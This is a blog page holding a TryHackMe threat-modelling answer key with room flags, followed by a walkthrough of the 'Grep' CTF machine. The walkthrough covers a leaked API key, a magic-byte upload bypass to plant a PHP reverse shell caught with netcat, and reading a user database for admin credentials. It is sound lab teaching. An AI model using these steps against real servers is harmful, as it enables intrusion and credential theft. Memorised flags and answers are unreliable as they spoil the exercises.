Q 5.1- What DREAD component assesses the potential harm from successfully exploiting a vulnerability?
A 5.1- Damage

Q 5.2- What DREAD component evaluates how others can easily find and identify the vulnerability?
A 5.2- Discoverability

Q 5.3- Which DREAD component considers the number of impacted users when a vulnerability is exploited?
A 5.3- Affected Users
 

Task 6 STRIDE Framework

In this task you will learn about STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service and Elevation of Privilege) framework and its application over Threat Modelling.

Q 6.1- What foundational information security concept does the STRIDE framework build upon?
A 6.1- CIA Triad

Q 6.2- What policy does Information Disclosure violate?
A 6.2- Confidentiality

Q 6.3- Which STRIDE component involves unauthorised modification or manipulation of data?
A 6.3- Tampering

Q 6.4- Which STRIDE component refers to the disruption of the system’s availability?
A 6.4- Denial of Service

Q 6.5- Provide the flag for the simulated threat modelling exercise.

Threat Modelling STRIDE

A 6.5- THM{m0d3ll1ng_w1th_STR1D3}
 

Task 7- PASTA Framework

In this task you will understand about another important framework called PASTA (Process for Attack Simulation and Threat Analysis) framework. You will learn about the guidelines, benefits and applications of PASTA Framework.

Q 7.1- In which step of the framework do you break down the system into its components?
A 7.1- Decompose the Application

Q 7.2- During which step of the PASTA framework do you simulate potential attack scenarios?
A 7.2- Analyse the Attacks

Q 7.3- In which step of the PASTA framework do you create an inventory of assets?
A 7.3- Define the Technical Scope

Q 7.4- Provide the flag for the simulated threat modelling exercise.
A 7.4- THM{c00k1ng_thr34ts_w_P4ST4}

We will be providing the answers for Security Engineer Learning Path. If you need the explanation to these answers, please comment below and we will provide the explanation as per request.

You can check out our other blogs here.
Happy Pentesting!!!
Team CyberiumX

TryHackMe- Grep

Posted on by CyberiumX

Hello folks,

This blog focuses on a recently added machine called “Grep” within “TryHackMe”. It has been classified as an easy-level challenge where we need to penetrate our way into a Linux machine. Let’s proceed without any delay and begin the penetration testing process.

You can access the Grep machine on TryHackMe by clicking here.

First of all let’s start the machine by clicking on “Start Machine”.

Scan the obtained IP using the tool “NMAP”.

nmap <Machine_IP>

1 nmap scan

Okay, so we have three open ports: 22 (SSH), 80 (HTTP) and 443 (HTTPS). If we try to open the web pages on 80 and 443 ports, we will not get anything special.

2. Webpage

Let’s perform Aggressive scan using NMAP with the help of following command:

nmap -A <Machine_IP>

3. Nmap A scan

In the response of NMAP scan, we can see that there is a domain name configured for the website which is “grep.thm”. So, we need to edit our /etc/hosts file so that we can access the website running on our target machine using the domain name as shown below:

4. etc hosts

Now if we try to open the web pages on 80 and 443 ports, we will see that the HTTPS website is showing a valid webpage which is under development. But HTTP is still showing the default page for Apache2.

5. webpage with domain name

There is a login page and a registration page. Let us explore the registration page and try to create a user account so we provided Username, Password, Email and Name and then clicked on Register. It gave us an error saying “Invalid or Expired API key”.

6. registration

I used Burp Suite and proxy all the traffic through it. There is a request header called “X-THM-API-Key” which has a value which is our invalid API.

7. Burp suite API error

Finding API Key on Grep

I searched everything on the website but couldn’t get another API. Then I read the description of the room again and remembered that we need to perform OSINT as well in the CTF in order to solve it.

So, it can be possible to look for the API key online for this room. I searched on google and got nothing interesting except SearchMe is a CMS. Then I thought we should search on GitHub for the same. I searched for SearchMeCMS and got one very interesting GitHub repository by supersecuredeveloper. You can check it out here.

8. Github

So we searched the repository but again got nothing in the code. But, wait it’s GitHub, so if the developer has made some changes in the webpage, we can check out the commits for it which might provide us the correct API.

There are 4 commits out of which one says “Fix: remove key” so let us click on it. And yes we got our API key.

9. API key

 

Finding First Flag on Grep

Let us copy it, go to Burp suite and replace the previous API key with the new one we just found. Let us send the request with the same details as previous and you will find that the registration is successful.

10. registration successful

After successfully registering ourselves on the website, let us go to the login page and try to login as our user “CyberiumX” and the password. We will see that we are logged in. Also, we got our First Flag as well.

11. First flag

 

Getting Foothold on Grep

Now, if we go back to the other commits, we will find that there is an upload page as well which we can open after visiting https://grep.thm/public/html/upload.php.

12. upload page

Also we can see which file types are allowed and which file type validation it is using to identify malicious files. The file validation type is Magic bytes which we can simply bypass by changing the file header value using a tool called Hexeditor.

13. magic bytes

Let us find a reverse shell written in PHP language. We can use the PHP reverse shell of Pentestmonkey which we can find either online or in our own machine at “/usr/share/webshells/php/php-reverse-shell.php”. Now we need to change the starting bits of the file with “ffd8ffe0” written in Hex.

In order to do it, edit the php file and add any characters in the beginning of the file and change the value of the IP variable to your tun0 interface’s IP address.

14. FIle editing

Now open the file using hexeditor tool and change the file header to jpeg (ffd8ffe0) using the following command:

hexeditor php-reverse-shell.php

15

After making the changes we can confirm that our file type is a jpeg image using the following command:

file php-reverse-shell.php

16 file command

Now let us upload the file on the web server using the upload functionality of the website. We will find that the malicious php file is uploaded successfully.

17. upload successful

Now we need to find the uploads page where we can see the uploaded documents and execute the malicious php file to get the reverse shell. We can use gobuster for this. The command will be as follows:

gobuster dir -u https://grep.thm/api -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20 -k 2>/dev/null

17.1 gobuster

We will find that there is a uploads page under api. The URL will be as follows:

https://grep.thm/api/uploads/

We will just click on the php-reverse-shell file to get the reverse connection from the target machine. Also, run netcat on our machine using the following command:

nc –nlvp 1234

As soon as we click on the file, we will get the reverse shell on our netcat

18. got access

 

Finding Email of Admin on Grep

Great!!! We got our grip on Grep. Now I explored everything and finally got something interesting at /var/www/backup directory. There is a file named users.sql which contains the details of users. We can simply read the file using following command:

cat users.sql

We can see the password hash and email of admin user.

19. got email and pass hash

 

Finding another Domain on Grep

Also we need to find the another domain where we can get the information of leaked passwords, so for this we can simple check the /etc/hosts file and try to ready it using following command:

cat /etc/hosts

where we will find another domain.

20. new domain

Now we need to add this domain name as well in the hosts file of our machine and then try to visit the URL on http and https.

We will see that it is showing the Apache2 default page on http and forbidden on HTTPS.

After trying everything I thought there might be some other port available on the same machine. I scanned the IP with NMAP but it was taking a lot of time in scanning so I tried rustscan and within 10 seconds I got another open port on the machine which is 51337

20.1 rustscan

 

Finding Admin’s Password on Grep

Finally on this port we got the access of our new subdomain where we can simply provide the email of admin to retrieve the password. We got the leaked password of an admin user which we can submit to solve the Grep machine.

21. password

Nice!!! This was an amazing and interesting box by TryHackMe. Please check out our other blogs on TryHackMe machines here.

Happy Pentesting!!!

Team CyberiumX